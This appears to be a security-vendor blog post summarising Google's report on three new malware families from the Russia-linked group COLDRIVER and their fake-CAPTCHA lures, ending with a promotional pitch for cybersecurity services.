Google Threat Intelligence Group (GTIG) has identified three new malware families, NOROBOT, YESROBOT, and MAYBEROBOT, developed by the Russia-linked hacking group COLDRIVER. These new tools represent a significant evolution in the group's tactics, techniques, and procedures, indicating an increased operational tempo and a shift in their targeting strategies.

Key Takeaways

• Google has identified three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT, attributed to the COLDRIVER hacking group.

• These new malware families show an "increased operations tempo" from the threat actor.

• The group has shifted from its typical credential theft targets to leveraging ClickFix-style lures for initial infection.

• Recent arrests in the Netherlands suggest a connection between individuals providing services to foreign governments and hacker groups affiliated with Russia.

Evolving Malware Arsenal

The newly discovered malware families are interconnected through a shared delivery chain. While COLDRIVER has historically focused on credential theft from high-profile individuals in NGOs, policy advisors, and dissidents, their recent activities involve using ClickFix-style lures. These lures trick users into executing malicious PowerShell commands through the Windows Run dialog, often disguised as a fake CAPTCHA verification prompt.

The ROBOT Malware Family

Following earlier attacks that deployed the LOSTKEYS information-stealing malware, subsequent intrusions have paved the way for the "ROBOT" family. NOROBOT and MAYBEROBOT are also tracked by Zscaler ThreatLabz as BAITSWITCH and SIMPLEFIX, respectively. The infection chain begins with an HTML lure called COLDCOPY, which drops a DLL named NOROBOT. This is then executed via rundll32.exe to deploy the next-stage malware.

Initially, these attacks distributed a Python backdoor known as YESROBOT. However, the threat actors later switched to a PowerShell implant named MAYBEROBOT. YESROBOT is a minimal backdoor that communicates via HTTPS to retrieve commands from a hard-coded command-and-control (C2) server, capable of downloading and executing files, and retrieving documents. Only two instances of YESROBOT deployment have been observed.

MAYBEROBOT is considered more flexible and extensible, with the ability to download and run payloads from a specified URL, execute commands using cmd.exe, and run PowerShell code. It is believed that YESROBOT was deployed as a temporary solution in response to the public disclosure of LOSTKEYS, before being replaced by MAYBEROBOT.

Shifting Tactics and Potential Espionage

Google suggests that NOROBOT and MAYBEROBOT are likely reserved for high-value targets, potentially compromised through phishing, with the ultimate goal of gathering additional intelligence. The continuous evolution of NOROBOT, including the splitting of cryptography keys, highlights COLDRIVER's efforts to evade detection systems for ongoing intelligence collection.

This development coincides with recent news from the Netherlands, where three 17-year-old men are suspected of providing services to a foreign government. One suspect is alleged to have been in contact with a hacker group affiliated with the Russian government, sharing information gathered from Wi-Fi network mapping for potential digital espionage and cyber attacks.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers, The Hacker News.

• Google identifies new malware linked to Russia-based hacking group, Yahoo.